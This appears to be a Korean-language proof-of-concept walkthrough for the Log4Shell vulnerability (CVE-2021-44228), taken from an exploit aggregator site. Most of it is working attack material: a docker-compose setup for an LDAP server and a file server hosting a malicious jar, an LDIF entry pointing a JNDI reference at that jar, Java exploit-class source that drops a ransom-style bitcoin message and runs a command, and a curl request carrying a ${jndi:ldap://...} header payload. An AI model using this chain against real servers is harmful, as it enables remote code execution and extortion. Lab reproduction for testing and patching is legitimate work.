Share
## https://sploitus.com/exploit?id=8021D807-3EDC-55A7-A9ED-A364159FADEE
# cve-2021-44228-log4j-test

ν…ŒμŠ€νŠΈ
  
## **1. LDAP μ„œλ²„μ™€ ν•΄ν‚Ή 파일 λ‹€μš΄λ‘œλ“œ μ„œλ²„**

### **1.1 Docker-compose μ‹€ν–‰**

- docker-compose.yml
    
    ```
    version: '2'
    services:
      dockerdj:
        image: openidentityplatform/opendj:latest
        container_name: ldap
        environment:
          ROOT_USER_DN: "cn=han"
          ROOT_PASSWORD: "han"
          BASE_DN: "dc=bumbing,dc=xyz"
        ports:
          - "389:1389"
          - "636:1636"
          - "4444:4444"
        volumes:
          - "./opendj/logs:/opt/opendj/data/logs"
      nginx:
        image: nginx:latest
        container_name: nginx
        ports:
          - "7080:80"
        volumes:
          - "./file:/usr/share/nginx/html:ro"
          - "./conf/nginx.conf:/etc/nginx/nginx.conf"
    ```
    
- docker-compose μ‹€ν–‰
    
    ```jsx
    docker-compose up -d
    ```
    

### **1.2. Ldif μΆ”κ°€**

- add.ldif
    
    ```
    version: 1
    
    dn: dc=bumbing,dc=xyz
    objectClass: domain
    objectClass: top
    dc: bumbing
    
    dn: cn=log4j,dc=bumbing,dc=xyz
    objectClass: javaContainer
    objectClass: javaNamingReference
    objectClass: javaObject
    objectClass: top
    cn: class
    javaClassName: xyz.bumbing.log4j.Exploit
    javaCodebase: http://{fileServer}:7080/exploit-1.jar
    javaFactory: xyz.bumbing.log4j.Exploit
    ```
    
- ν•΄ν‚Ή 파일 정보가 λ“€μ–΄κ°„ Entry μΆ”κ°€ μ»€λ©˜λ“œ
    
    ```
    ldapadd -D "cn=han" -w han -H ldap://{ldapServer} -f add.ldif
    ```
    
- ldap ν…ŒμŠ€νŠΈ(νŒŒλΌλ©”ν„° μˆœμ„œ μ€‘μš”)
    
    ```
    curl ldap://{ldapServer}/cn=log4j,dc=bumbing,dc=xyz
    ```
    

## **2. μ•…μ„± 파일**

- μžλ°” 8u191 이전 λ²„μ „μ—μ„œ 취약점 발견, μžλ°” 버전 8λ²„μ „μœΌλ‘œ λΉŒλ“œ

### **2.1 μ•…μ„± 파일 λΉŒλ“œ**

- μ•…μ„± μ½”λ“œ(λ‹€λ₯Έ μ•…μ„±νŒŒμΌμ„ λ‹€μš΄λ°›λŠ” μ»€λ©˜λ“œλ₯Ό μΆ”κ°€ν•  수 μžˆλ‹€.)
    
    ```java
    	public class Exploit implements javax.naming.spi.ObjectFactory{
            @Override
            public Object getObjectInstance(Object o, Name name, Context context, Hashtable<?, ?> hashtable) throws Exception {
        
                try {
                    new File("/Users//test").createNewFile();
                    String msg = "your computer has our virus. if you want to recover your computer, send bitcoin our wallet";
                    FileOutputStream fileOutputSteam = new FileOutputStream(new File("/Users/hanbeomhee/test"));
                    StringBuilder sb = new StringBuilder();
                    sb.append(o.toString()).append("\n");
                    sb.append(name).append("\n");
                    sb.append(msg);
                    fileOutputSteam.write(sb.toString().getBytes(StandardCharsets.UTF_8));
                    fileOutputSteam.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
    						Runtime.getRuntime().exec("open /Users//test");
                return null;
            }
        
        }
    ```
    
- λΉŒλ“œ μ»€λ©˜λ“œ
    
    ```bash
    ./gradlew clean build
    ```
- 둜컬 μ„œλ²„ μ•„λ‹μ‹œ exploit-1.jar파일  파일 μ„œλ²„μ˜ docker/file 폴더에 μ—…λ‘œλ“œ
    
- http://{fileServer}:7080/exploit-1.jar λ‹€μš΄λ‘œλ“œ 확인

## **3. 취약점 μ„œλ²„ μ—΄κΈ°**

- κ·Έλž˜λ“€ ꡬ쑰
    
    ```java
    plugins {
        	id 'org.springframework.boot' version '2.6.1'
        	id 'io.spring.dependency-management' version '1.0.11.RELEASE'
        	id 'java'
        }
        
        group = 'xyz.bumbing'
        version = '0.0.1-SNAPSHOT'
        sourceCompatibility = '8'
        
        configurations {
        	compileOnly {
        		extendsFrom annotationProcessor
        	}
        }
        
        repositories {
        	mavenCentral()
        }
        
        dependencies {
        	implementation 'org.springframework.boot:spring-boot-starter-web'
        	compileOnly 'org.projectlombok:lombok'
        	annotationProcessor 'org.projectlombok:lombok'
        	testImplementation 'org.springframework.boot:spring-boot-starter-test'
        	implementation "org.springframework.boot:spring-boot-starter-log4j2"
        	modules {
        		module("org.springframework.boot:spring-boot-starter-logging") {
        			replacedBy("org.springframework.boot:spring-boot-starter-log4j2", "Use Log4j2 instead of Logback")
        		}
        	}
        }
        
        test {
        	useJUnitPlatform()
        }
    ```
    
    - dependencyμ—μ„œ log4j 버전 14.1 확인
- μ„œλ²„μ½”λ“œ
    
    ```java
    @SpringBootApplication
    @RestController
    @Slf4j
    public class Log4jtestApplication {
    
    	public static void main(String[] args) {
    		SpringApplication.run(Log4jtestApplication.class, args);
    	}
    
    	@GetMapping("/log4j")
    	public void test(String param, HttpServletRequest request){
    		log.info(request.getHeader("User-Agent"));
    	}
    }
    ```
    
- μ‹€ν–‰ μ»€λ©˜λ“œ(8u191 μ΄μ „κ±Έλ‘œ λΉŒλ“œ 및 μ‹€ν–‰ 해야함)
    
    ```java
    java -jar build/libs/log4jtest-0.0.1-SNAPSHOT.jar
    ```
    

## **4. μ‹€ν–‰**

### 4.1 μ‹€ν–‰

```
curl --location --request GET 'localhost:8080/log4j' \
--header 'User-Agent: ${jndi:ldap://localhost/cn=log4j,dc=bumbing,dc=xyz}'
```